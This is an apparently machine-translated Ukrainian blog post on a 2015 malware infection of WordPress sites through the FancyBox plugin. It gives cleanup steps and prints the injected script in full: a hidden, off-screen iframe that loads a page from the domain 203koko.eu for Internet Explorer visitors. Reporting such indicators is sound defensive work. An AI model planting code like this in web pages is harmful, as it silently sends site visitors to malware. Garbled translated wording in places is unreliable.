На початку тижня серія сайтів і блогів с WordPress, отримав попередження про зараження шкідливим програмним забезпеченням через Google веб -майстри.
Проблема, до якої Google веб -майстри відноситься до наявності a тріска / сценарій зловмисне програмне забезпечення iframe на вихідних веб-сторінках.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Здається, йдеться про а уразливість a плагіннакопичуватисяFancyBox для WordPress який до вчорашнього дня (05.02.2015) давно не оновлювався.
Вирішення цієї проблеми і дезінфекція вірусних сайтів з цією шкідливою програмою це відносно просто.
1. Вимкніть плагін FancyBox.
2. Видаліть усі файли плагінів FancyBox із сервера (через FTP)
3. Встановіть нову версію плагіна (FancyBox 3.0.4)
FancyBox для WordPress 3.0.4
– Перейменовано параметр, на який впливає проблема безпеки, згадана в 3.0.3. Це повинно зупинити появу зловмисного коду на сайтах, де плагін оновлюється без видалення зловмисного коду.
FancyBox для WordPress 3.0.3
– Виправлено проблему безпеки.
Інформація про зловмисне програмне забезпечення:
ТИП: Переспрямування iframe
ЦІЛЬ: WordPress Fancybox
ДОМЕН ШКІДЛИВОГО ПЗ: 203koko.eu
URI зловмисного програмного забезпечення: http://203koko.eu/hjnfh/ipframe2.php
RAW КОД ШКІДЛИВОГО ПЗ: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” ширина=”20″ висота=”30″ ></iframe>
СЦЕНАРІЙ ШКІДЛИВОГО ПЗ: <сценарій>if (navigator.userAgent.match(/msie/i)) {document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”>
Видаліть зловмисне програмне забезпечення зі свого сайту WordPress.
